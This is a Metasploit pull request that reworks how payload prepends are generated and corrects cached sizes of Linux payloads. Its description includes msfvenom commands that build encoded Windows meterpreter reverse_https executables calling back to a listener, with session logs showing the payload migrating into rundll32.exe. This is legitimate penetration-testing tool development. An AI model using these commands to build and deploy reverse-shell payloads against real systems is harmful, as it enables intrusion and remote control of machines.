### PR TITLE
Reworks how payload prepends work internally, see #1674

### DIFF
--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -94,7 +94,7 @@ class EncodedPayload
   #
   # @return [String] The raw, unencoded payload.
   def generate_raw
-    self.raw = (reqs['Prepend'] || '') + pinst.generate + (reqs['Append'] || '')
+    self.raw = (reqs['Prepend'] || '') + pinst.generate_complete + (reqs['Append'] || '')
 
     # If an encapsulation routine was supplied, then we should call it so
     # that we can get the real raw payload.

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -312,6 +312,13 @@ class Payload < Msf::Module
   end
 
   #
+  # Generates the payload and returns the raw buffer to the caller,
+  # handling any post-processing tasks, such as prepended code stubs.
+  def generate_complete
+    apply_prepends(generate)
+  end
+
+  #
   # Substitutes variables with values from the module's datastore in the
   # supplied raw buffer for a given set of named offsets.  For instance,
   # RHOST is substituted with the RHOST value from the datastore which will
@@ -463,6 +470,13 @@ class Payload < Msf::Module
     }
 
     return nops
+  end
+
+  #
+  # A placeholder stub, to be overriden by mixins
+  #
+  def apply_prepends(raw)
+    raw
   end
 
   ##

--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -91,9 +91,7 @@ module Msf::Payload::Linux
   #
   # Overload the generate() call to prefix our stubs
   #
-  def generate(*args)
-    # Call the real generator to get the payload
-    buf = super(*args)
+  def apply_prepends(buf)
     pre = ''
     app = ''
 

--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -38,9 +38,11 @@ module Msf::Payload::Windows
       'none'    => 0x5DE2C5AA, # GetLastError
     }
 
-
-  def generate
-    return prepends(super)
+  #
+  # Implement payload prepends for Windows payloads
+  #
+  def apply_prepends(raw)
+    apply_prepend_migrate(raw)
   end
 
   #

--- a/lib/msf/core/payload/windows/prepend_migrate.rb
+++ b/lib/msf/core/payload/windows/prepend_migrate.rb
@@ -34,7 +34,7 @@ module Msf::Payload::Windows::PrependMigrate
   #
   # Overload the generate() call to prefix our stubs
   #
-  def prepends(buf)
+  def apply_prepend_migrate(buf)
     pre = ''
 
     test_arch = [ *(self.arch) ]

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -16,6 +16,7 @@ module Msf
 
 module Payload::Windows::ReverseHttp
 
+  include Msf::Payload::Windows
   include Msf::Payload::Windows::BlockApi
   include Msf::Payload::Windows::Exitfunk
 

--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 209
+  CachedSize = 40
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 255
+  CachedSize = 86
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 226
+  CachedSize = 57
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 243
+  CachedSize = 74
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/adduser.rb
+++ b/modules/payloads/singles/linux/x86/adduser.rb
@@ -17,7 +17,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 219
+  CachedSize = 97
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/chmod.rb
+++ b/modules/payloads/singles/linux/x86/chmod.rb
@@ -12,7 +12,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 158
+  CachedSize = 36
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -15,7 +15,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 158
+  CachedSize = 36
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit3
 
-  CachedSize = 122
+  CachedSize = 0
 
   include Msf::Payload::Linux
   include Msf::Payload::Single

--- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit3
 
-  CachedSize = 122
+  CachedSize = 0
 
   include Msf::Payload::Linux
   include Msf::Payload::Single

--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 184
+  CachedSize = 62
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 212
+  CachedSize = 90
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 200
+  CachedSize = 78
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 179
+  CachedSize = 57
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_find_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_find_port.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 184
+  CachedSize = 62
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_find_tag.rb
+++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 191
+  CachedSize = 69
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 190
+  CachedSize = 68
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 
 module Metasploit3
 
-  CachedSize = 247
+  CachedSize = 78
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module Metasploit3
 
-  CachedSize = 237
+  CachedSize = 68
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 # Linux Bind TCP/IPv6 Stager
 module Metasploit3
 
-  CachedSize = 207
+  CachedSize = 85
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
@@ -18,7 +18,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 185
+  CachedSize = 63
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb
@@ -18,7 +18,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 201
+  CachedSize = 79
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/find_tag.rb
+++ b/modules/payloads/stagers/linux/x86/find_tag.rb
@@ -18,7 +18,7 @@ require 'msf/core/handler/find_tag'
 ###
 module Metasploit3
 
-  CachedSize = 159
+  CachedSize = 37
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 # Linux Reverse TCP/IPv6 Stager
 module Metasploit3
 
-  CachedSize = 199
+  CachedSize = 77
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
@@ -18,7 +18,7 @@ require 'msf/core/handler/reverse_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 172
+  CachedSize = 50
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -18,7 +18,7 @@ require 'msf/core/handler/reverse_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 193
+  CachedSize = 71
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux


### PR DESCRIPTION
This changeset solves two problems with payloads that have support for "prepends":
- Windows modules that defined `generate()` can now use `PrependMigrate` without crashing (#1674)
- Linux module sizes are now calculated accurately and don't assume all `Prepend*` options are enabled

This change is backwards compatible. Any third-party code that happens to call `payload.generate` instead of `payload.generate_complete` will get working payload output, but they will not be able to take advantage of the Linux or Windows mixin prepends.

First testing reverse_https without PrependMigrate:

```
$ ./msfvenom -b '\x00' -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PrependMigrate=false -s 600 -f exe -o /scratch/reverse_https_nomigrate.exe
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 364 (iteration=0)
Saved as: /scratch/reverse_https_nomigrate.exe

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.6:5762 Request received for /zY9P...
[*] 192.168.0.6:5762 Staging connection for target /zY9P received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.6:5762) at 2015-03-12 02:41:28 -0500

meterpreter > getpid
Current pid: 5624
meterpreter > ps

Process List
============
<snip>
 5624  5600  reverse_https_nomigrate.exe   x86     1           z420\Developer  Z:\reverse_https_nomigrate.exe
```

Now testing reverse_https **with** PrependMigrate:

```
$ ./msfvenom -b '\x00' -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PrependMigrate=true -s 600 -f exe -o /scratch/reverse_https_migrate.exe
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 518 (iteration=0)
Saved as: /scratch/reverse_https_migrate.exe

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.6:5873 Request received for /QmOO...
[*] 192.168.0.6:5873 Staging connection for target /QmOO received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.6:5873) at 2015-03-12 02:42:50 -0500

meterpreter > getpid
Current pid: 7756

meterpreter > ps

Process List
============
<snip>
 7756  7336  rundll32.exe                  x86     1           z420\Developer  C:\WINDOWS\SysWOW64\rundll32.exe
```
